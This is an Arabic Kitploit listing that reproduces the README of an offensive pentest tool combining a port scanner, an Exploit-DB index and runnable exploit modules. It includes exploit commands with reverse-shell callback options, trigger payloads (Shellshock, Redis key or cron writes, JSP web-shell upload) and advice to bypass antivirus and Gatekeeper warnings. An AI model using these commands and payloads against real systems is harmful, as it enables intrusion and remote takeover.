Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
ultrasploiter — ثنائي واحد يدمج ماسح منافذ، وفهرس Exploit-DB الكامل (47 ألف مدخل) ووحدات استغلال قابلة للتشغيل في أداة واحدة. مكتوب بلغة Rust، ويعمل على Linux وWindows وmacOS. | Kitploit
أدوات/GitLabGitLab/vqkro/ultrasploiter
أطر اختبار الاختراقالاستطلاعماسحات الثغرات الأمنيةأطر الاستغلالتخطيط الشبكةمسح المنافذالاستغلالاستغلال تطبيقات الويبجمع المعلوماتالقيادة والسيطرةالفريق الأحمرتطوير الحمولات
10منذ 13س 11دلم تتم المراجعة بعد
GitLabvqkro/ultrasploiter

ultrasploiter

ثنائي واحد يدمج ماسح منافذ، وفهرس Exploit-DB الكامل (47 ألف مدخل) ووحدات استغلال قابلة للتشغيل في أداة واحدة. مكتوب بلغة Rust، ويعمل على Linux وWindows وmacOS.

عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

UltraSploiter

فحص، مطابقة، استغلال — عنوان IP واحد يدخل، وأصداف تخرج.

ملف تنفيذي واحد يدمج ماسح منافذ، وفهرس Exploit-DB الكامل، ومجموعة من وحدات الاستغلال القابلة للتشغيل في أداة واحدة. يعمل على Linux وWindows وmacOS.

المهمةعادةًهنا
العثور على الخدمات على مضيفnmapUltraSploiter scan <ip>
البحث عن ثغراتsearchsploitUltraSploiter search <kw>
إطلاقهاmsfconsoleUltraSploiter exploit <ip> <module>

UltraSploiter menu


التثبيت

أبسط وأفضل طريقة هي مجرد الحصول على الملف التنفيذي الجاهز وتشغيله. لا شيء لتثبيته، لا تبعيات — ملف واحد مكتفٍ ذاتيًا.

حمّل من صفحة الإصدارات:

  • Windows — UltraSploiter-windows-x86_64.exe → انقر نقرًا مزدوجًا
  • Linux — UltraSploiter-linux-x86_64
  • macOS — لا يوجد ملف تنفيذي جاهز بعد؛ ابنِه بأمر واحد (أدناه)

تنبيه: أدوات الأمان يتم الإبلاغ عنها. من المرجح أن يحذّر Windows SmartScreen ومضاد الفيروسات أو يحجر الملف التنفيذي — انقر More info → Run anyway، أو أضف استثناءً إذا كنت ستحتفظ به.

Windows

انقر نقرًا مزدوجًا على UltraSploiter.exe. ستُفتح القائمة.

إذا حذّر SmartScreen من ناشر غير معروف (سيحدث ذلك، لأي ملف تنفيذي غير موقّع)، انقر More info → Run anyway.

Linux

chmod +x UltraSploiter-linux-x86_64
./UltraSploiter-linux-x86_64

macOS

chmod +x UltraSploiter-macos-arm64
./UltraSploiter-macos-arm64

إذا حجبه Gatekeeper (مجددًا، أي ملف تنفيذي غير موقّع)، إما انقر بزر الفأرة الأيمن → Open، أو أزل علامة الحجر مرة واحدة:

xattr -d com.apple.quarantine UltraSploiter-macos-arm64

البناء من المصدر

مطلوب فقط إذا لم يكن هناك ملف تنفيذي لمنصتك، أو أردت تعديله. يتطلب Rust 1.74+.

Linux

sudo apt install build-essential    # gcc + linker (Debian/Ubuntu)
git clone https://gitlab.com/vqkro/ultrasploiter
cd ultrasploiter
./build.sh                          # -> ./UltraSploiter

macOS

xcode-select --install              # clang + linker
git clone https://gitlab.com/vqkro/ultrasploiter
cd ultrasploiter
./build.sh                          # -> ./UltraSploiter

Windows

git clone https://gitlab.com/vqkro/ultrasploiter
cd ultrasploiter
.\build.ps1                         # -> UltraSploiter.exe

يستخدم build.ps1 سلسلة الأدوات stable-x86_64-pc-windows-gnu، التي تربط مع MinGW — لذا لا تحتاج إلى Visual Studio أو MSVC. يثبّت سلسلة الأدوات تلك إذا كانت مفقودة. إذا كان لديك بالفعل MSVC Build Tools، فإن أمر cargo build --release العادي يعمل أيضًا.

تنبيه Windows + GNU: يستدعي windows-sys (الذي يجلبه tokio) الأمر dlltool، الذي يستدعي بدوره المُجمّع as — ومكوّن rust-mingw لا يوفّر as. يبحث build.ps1 عن مجلد MinGW bin الذي يحتويه في %~dp0tools\mingw64\bin و%USERPROFILE%\tools\mingw64\bin، ويضيفه إلى PATH عند العثور عليه. ضع نسخة winlibs هناك إذا واجهت error calling dlltool. سلاسل أدوات MSVC غير متأثرة.


تشغيله

بدون وسائط تحصل على القائمة:

   1)  Scan a target           find open ports and services
   2)  Search exploits         keyword lookup
   3)  List runnable modules
   4)  Run an exploit          pick a target and a module
   5)  Console                 advanced msf-style commands
   0)  Exit

سطر الأوامر

UltraSploiter scan 10.0.0.5                      # top 1000 ports + fingerprint + suggestions
UltraSploiter scan 10.0.0.5 -p 1-1024 -T4        # range, fast timing
UltraSploiter scan 10.0.0.5 -p -                 # all 65535 ports
UltraSploiter scan 10.0.0.5 -sU                  # UDP scan
UltraSploiter scan 10.0.0.5 --json
UltraSploiter scan 10.0.0.5 -oX out.xml
UltraSploiter search samba
UltraSploiter info 17491
UltraSploiter show 17491                          # print the PoC source for an Exploit-DB id
UltraSploiter modules
UltraSploiter msf search smb                      # bridge to Metasploit (needs it installed)
UltraSploiter exploit 10.0.0.5 vsftpd_234
UltraSploiter exploit 10.0.0.5 shellshock -o lhost=10.0.0.1 -o lport=4444
UltraSploiter console

على Linux/macOS، أضف البادئة ./ (مثل ./UltraSploiter scan 10.0.0.5).

وسائط الفحص

الوسيطالمعنى
-p <spec>top (1000)، 80,443، 1-1024، - (الكل)
-T0..-T5قالب التوقيت — من أبطأ/أهدأ إلى أسرع/أكثر ضجيجًا
-sUفحص استكشاف UDP
-sVكشف الخدمة/الإصدار (مفعّل افتراضيًا)
--no-bannerتخطي التقاط البانر
--jsonJSON إلى stdout
-oX <file>XML بنمط nmap

الماسح غير متزامن (tokio): كل مستوى -T يحدد عدد المقابس النشطة في آن واحد (حتى 8000 عند -T5)، لذا يغطي قائمة nmap top-1000 في ثانيتين. كل "open" هو مصافحة TCP مكتملة، لذا النتائج دقيقة.

الخيارات (-o key=value)

المفتاحيستخدمهالمعنى
lhost, lportوحدات rev-shellعنوان الاستدعاء الراجع
rportوحدات الويبتجاوز منفذ HTTP
pathshellshock، struts، phpunitمسار نقطة النهاية
user, passtomcat_managerبيانات اعتماد المدير
coresolr_rceاسم نواة Solr
filegrafana_lfiالملف المراد قراءته
ssh_pubkeyredis_unauthالمفتاح المراد إسقاطه في authorized_keys
src, dstproftpd_modcopyنسخ المصدر / الوجهة
timeoutالكلمهلة المقبس بالثواني

قاعدة بيانات الثغرات

search وinfo مدعومان بفهرس Exploit-DB الكامل — أكثر من 47,000 مدخل (نفس مجموعة البيانات التي يستخدمها searchsploit)، مضمّن في الملف التنفيذي. عندما يحمل مدخل CVE تنفّذه وحدة قابلة للتشغيل، يربط info بينهما:

$ UltraSploiter info 17491
Exploit-DB 17491
  description  vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)
  codes        OSVDB-73573;CVE-2011-2523

  [runnable] vsftpd_234
  UltraSploiter exploit <ip> vsftpd_234

الوحدات القابلة للتشغيل (37)

الوحدةCVEالمُشغّل
vsftpd_234CVE-2011-2523اسم المستخدم :) → صدفة bind بصلاحيات root على 6200
unrealircd_backdoorCVE-2010-2075AB; <cmd> عبر IRC
distcc_execCVE-2004-2687وسيط مُجمّع بروتوكول DIST
proftpd_modcopyCVE-2015-3306نسخ ملف SITE CPFR/CPTO
redis_unauth—CONFIG SET يكتب مفتاحًا أو مدخل cron
shellshockCVE-2014-6271User-Agent: () { :; }; <cmd>
struts2_5638CVE-2017-5638OGNL في Content-Type
tomcat_putCVE-2017-12615PUT لصدفة ويب JSP
tomcat_manager—نشر WAR عبر /manager
elasticsearch_groovyCVE-2015-1427تنفيذ Groovy عن بُعد في _search
drupalgeddon2CVE-2018-7600استدعاء عرض Form API
phpunit_evalCVE-2017-9841eval-stdin.php
jenkins_scriptCVE-2019-1003000/script Groovy بدون مصادقة
solr_rceCVE-2019-17558قالب Velocity في stream.body
grafana_lfiCVE-2021-43798قراءة ملف عبر اجتياز مسار الإضافة
webmin_backdoorCVE-2019-15107password_change.cgi يمرّر قيمة إلى صدفة
php_cgi_arg_injectionCVE-2012-1823-d auto_prepend_file عبر سلسلة الاستعلام

كل وحدة تنفّذ check() غير مدمّر وrun().

وحدات الكتالوج (مدفوعة بالبيانات)

هذه وصفات JSON صغيرة يشغّلها محرك الكتالوج في data/catalog.json. إضافة وحدة هي ~8 أسطر من البيانات، وليس ملف مصدر جديد:

تنزيل الأداة